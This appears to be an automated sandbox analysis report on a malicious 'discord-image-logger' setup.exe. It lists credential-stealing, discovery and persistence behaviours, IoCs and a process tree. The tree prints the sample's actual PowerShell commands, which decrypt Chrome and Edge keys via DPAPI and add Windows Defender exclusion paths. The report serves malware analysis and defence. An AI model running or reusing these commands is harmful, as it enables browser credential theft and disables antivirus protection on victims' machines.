22c608eac14edf82c42954b3b4aaac440467d3e0e7b5cb84fd9bf0a209eacb4d

Resubmissions

06/04/2025, 03:56

250406-ehqdpatn18 10

Analysis

max time kernel
67s
max time network
69s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
06/04/2025, 03:56

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

discord-image-logger-main/discord-image-logger-main/setup.exe
Size

37.2MB
MD5

7d7cf419472226353cad4fa52730b5e4
SHA1

d545b9124465f3a37bd30adf74158ca94d223622
SHA256

b2f974a98abb0cb61bfa61c58887a2a0acb73f9b16074d2bd740f2c66c9fe513
SHA512

7e51e533dbdf6b42b3f9e51a2ef3e7b20c532053d0b46d8aac277d1cfd4e1638f5692983dff5ac7fd805c996240cd048089b72965fe75a922ad5029b801dec1a
SSDEEP

393216:JQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgU96l+ZArYsFRlCbC:J3on1HvSzxAMNUFZArYsKbG/Pvx7OZQn

Score

8^/10

discovery execution persistence spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
5472	powershell.exe
6080	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation	setup.exe

Executes dropped EXE 5 IoCs

pid	Process
5608	python-installer.exe
2172	python-installer.exe
1252	python-3.12.6-amd64.exe
2312	python-3.12.6-amd64.exe
6128	python-3.12.6-amd64.exe

Loads dropped DLL 3 IoCs

pid	Process
3552	setup.exe
2172	python-installer.exe
6128	python-3.12.6-amd64.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce"	python-3.12.6-amd64.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
33	1996	msiexec.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
11	discord.com
23	discord.com

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
4932	cmd.exe
5848	cmd.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\dNQ5j5YPpa.txt	setup.exe
File created	C:\Windows\System32\dNQ5j5YPpa.txt	setup.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

discovery

Process Discovery

T1057

pid	Process
5836	tasklist.exe
5000	tasklist.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\e57b4f8.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBC89.tmp	msiexec.exe
File created	C:\Windows\Installer\e57b4fc.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBE40.tmp	msiexec.exe
File created	C:\Windows\Installer\e57b4f8.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File created	C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378}	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-3.12.6-amd64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-3.12.6-amd64.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-3.12.6-amd64.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "232"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe

Modifies registry class 33 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0"	python-3.12.6-amd64.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)"	python-3.12.6-amd64.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12	python-3.12.6-amd64.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}	python-3.12.6-amd64.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}"	python-3.12.6-amd64.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-3.12.6-amd64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\ = "{537B2AF5-504B-4303-99CB-FDE56F47AA51}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\DisplayName = "Python 3.12.6 Executables (64-bit)"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0"	python-3.12.6-amd64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)"	python-3.12.6-amd64.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}	python-3.12.6-amd64.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents	python-3.12.6-amd64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}"	python-3.12.6-amd64.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents	python-installer.exe
Key deleted	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12	python-3.12.6-amd64.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}"	python-installer.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
5048	powershell.exe
5048	powershell.exe
5492	powershell.exe
5492	powershell.exe
5472	powershell.exe
5472	powershell.exe
6080	powershell.exe
6080	powershell.exe
1996	msiexec.exe
1996	msiexec.exe
1996	msiexec.exe
1996	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5836	tasklist.exe
Token: SeDebugPrivilege	5000	tasklist.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	5492	powershell.exe
Token: SeDebugPrivilege	5472	powershell.exe
Token: SeDebugPrivilege	6080	powershell.exe
Token: SeShutdownPrivilege	2172	python-installer.exe
Token: SeIncreaseQuotaPrivilege	2172	python-installer.exe
Token: SeSecurityPrivilege	1996	msiexec.exe
Token: SeCreateTokenPrivilege	2172	python-installer.exe
Token: SeAssignPrimaryTokenPrivilege	2172	python-installer.exe
Token: SeLockMemoryPrivilege	2172	python-installer.exe
Token: SeIncreaseQuotaPrivilege	2172	python-installer.exe
Token: SeMachineAccountPrivilege	2172	python-installer.exe
Token: SeTcbPrivilege	2172	python-installer.exe
Token: SeSecurityPrivilege	2172	python-installer.exe
Token: SeTakeOwnershipPrivilege	2172	python-installer.exe
Token: SeLoadDriverPrivilege	2172	python-installer.exe
Token: SeSystemProfilePrivilege	2172	python-installer.exe
Token: SeSystemtimePrivilege	2172	python-installer.exe
Token: SeProfSingleProcessPrivilege	2172	python-installer.exe
Token: SeIncBasePriorityPrivilege	2172	python-installer.exe
Token: SeCreatePagefilePrivilege	2172	python-installer.exe
Token: SeCreatePermanentPrivilege	2172	python-installer.exe
Token: SeBackupPrivilege	2172	python-installer.exe
Token: SeRestorePrivilege	2172	python-installer.exe
Token: SeShutdownPrivilege	2172	python-installer.exe
Token: SeDebugPrivilege	2172	python-installer.exe
Token: SeAuditPrivilege	2172	python-installer.exe
Token: SeSystemEnvironmentPrivilege	2172	python-installer.exe
Token: SeChangeNotifyPrivilege	2172	python-installer.exe
Token: SeRemoteShutdownPrivilege	2172	python-installer.exe
Token: SeUndockPrivilege	2172	python-installer.exe
Token: SeSyncAgentPrivilege	2172	python-installer.exe
Token: SeEnableDelegationPrivilege	2172	python-installer.exe
Token: SeManageVolumePrivilege	2172	python-installer.exe
Token: SeImpersonatePrivilege	2172	python-installer.exe
Token: SeCreateGlobalPrivilege	2172	python-installer.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe
Token: SeRestorePrivilege	1996	msiexec.exe
Token: SeTakeOwnershipPrivilege	1996	msiexec.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1848	LogonUI.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 3552 wrote to memory of 1752	3552	setup.exe	88
PID 3552 wrote to memory of 1752	3552	setup.exe	88
PID 1752 wrote to memory of 5836	1752	cmd.exe	89
PID 1752 wrote to memory of 5836	1752	cmd.exe	89
PID 3552 wrote to memory of 4920	3552	setup.exe	91
PID 3552 wrote to memory of 4920	3552	setup.exe	91
PID 3552 wrote to memory of 4932	3552	setup.exe	92
PID 3552 wrote to memory of 4932	3552	setup.exe	92
PID 4932 wrote to memory of 5048	4932	cmd.exe	93
PID 4932 wrote to memory of 5048	4932	cmd.exe	93
PID 4920 wrote to memory of 5000	4920	cmd.exe	94
PID 4920 wrote to memory of 5000	4920	cmd.exe	94
PID 3552 wrote to memory of 5848	3552	setup.exe	95
PID 3552 wrote to memory of 5848	3552	setup.exe	95
PID 5848 wrote to memory of 5492	5848	cmd.exe	96
PID 5848 wrote to memory of 5492	5848	cmd.exe	96
PID 3552 wrote to memory of 2728	3552	setup.exe	97
PID 3552 wrote to memory of 2728	3552	setup.exe	97
PID 2728 wrote to memory of 5472	2728	cmd.exe	98
PID 2728 wrote to memory of 5472	2728	cmd.exe	98
PID 3552 wrote to memory of 2644	3552	setup.exe	99
PID 3552 wrote to memory of 2644	3552	setup.exe	99
PID 2644 wrote to memory of 6080	2644	cmd.exe	100
PID 2644 wrote to memory of 6080	2644	cmd.exe	100
PID 3552 wrote to memory of 1932	3552	setup.exe	101
PID 3552 wrote to memory of 1932	3552	setup.exe	101
PID 3552 wrote to memory of 5608	3552	setup.exe	106
PID 3552 wrote to memory of 5608	3552	setup.exe	106
PID 3552 wrote to memory of 5608	3552	setup.exe	106
PID 5608 wrote to memory of 2172	5608	python-installer.exe	109
PID 5608 wrote to memory of 2172	5608	python-installer.exe	109
PID 5608 wrote to memory of 2172	5608	python-installer.exe	109
PID 5664 wrote to memory of 1252	5664	cmd.exe	113
PID 5664 wrote to memory of 1252	5664	cmd.exe	113
PID 5664 wrote to memory of 1252	5664	cmd.exe	113
PID 1252 wrote to memory of 2312	1252	python-3.12.6-amd64.exe	114
PID 1252 wrote to memory of 2312	1252	python-3.12.6-amd64.exe	114
PID 1252 wrote to memory of 2312	1252	python-3.12.6-amd64.exe	114
PID 2312 wrote to memory of 6128	2312	python-3.12.6-amd64.exe	115
PID 2312 wrote to memory of 6128	2312	python-3.12.6-amd64.exe	115
PID 2312 wrote to memory of 6128	2312	python-3.12.6-amd64.exe	115
PID 3552 wrote to memory of 1420	3552	setup.exe	117
PID 3552 wrote to memory of 1420	3552	setup.exe	117

C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\discord-image-logger-main\setup.exe
"C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\discord-image-logger-main\setup.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1752
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:5836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:5000
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,38,53,230,197,33,120,24,128,57,130,175,24,16,157,94,219,204,161,159,192,238,248,163,125,104,108,253,48,177,235,239,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,231,174,89,227,197,169,27,255,245,37,8,249,200,4,196,91,115,187,238,183,165,132,202,153,200,102,42,118,62,188,72,171,48,0,0,0,214,179,254,122,7,133,182,181,235,31,125,85,40,210,149,210,49,19,197,223,106,208,2,47,159,84,155,56,10,32,57,200,128,246,130,175,255,128,68,62,197,242,70,198,86,192,46,228,64,0,0,0,186,219,123,20,45,44,200,251,86,228,189,101,158,74,47,167,9,111,16,39,91,117,180,163,51,34,217,178,19,20,85,63,131,230,35,200,94,35,219,103,80,209,237,222,231,137,161,80,125,93,227,201,30,107,108,39,71,80,112,127,41,166,136,206), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')"
  2⤵
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - Suspicious use of WriteProcessMemory
  PID:5848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,89,13,96,20,124,32,138,78,177,192,112,32,73,193,134,168,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,39,176,100,150,155,228,99,206,251,245,79,232,15,2,249,165,174,222,157,101,219,166,142,132,214,9,196,54,119,223,139,81,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,92,148,160,188,78,85,67,148,110,220,32,35,164,65,10,94,222,165,98,37,26,120,211,39,92,252,239,53,27,178,233,48,0,0,0,222,123,150,48,122,194,224,150,27,111,124,103,202,5,166,137,105,151,163,126,28,94,11,204,254,34,233,4,34,233,116,25,177,34,3,94,136,136,125,191,153,51,89,249,19,34,92,127,64,0,0,0,185,255,25,159,73,177,245,200,115,212,45,37,53,13,142,223,75,206,72,215,154,58,128,21,90,242,63,238,213,56,82,87,26,23,186,187,114,189,101,150,76,244,152,221,198,249,15,203,63,32,125,9,39,82,116,60,65,117,98,43,156,75,75,66), $null, 'CurrentUser')
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.jDeiIlK9KD""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.jDeiIlK9KD"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
    3⤵
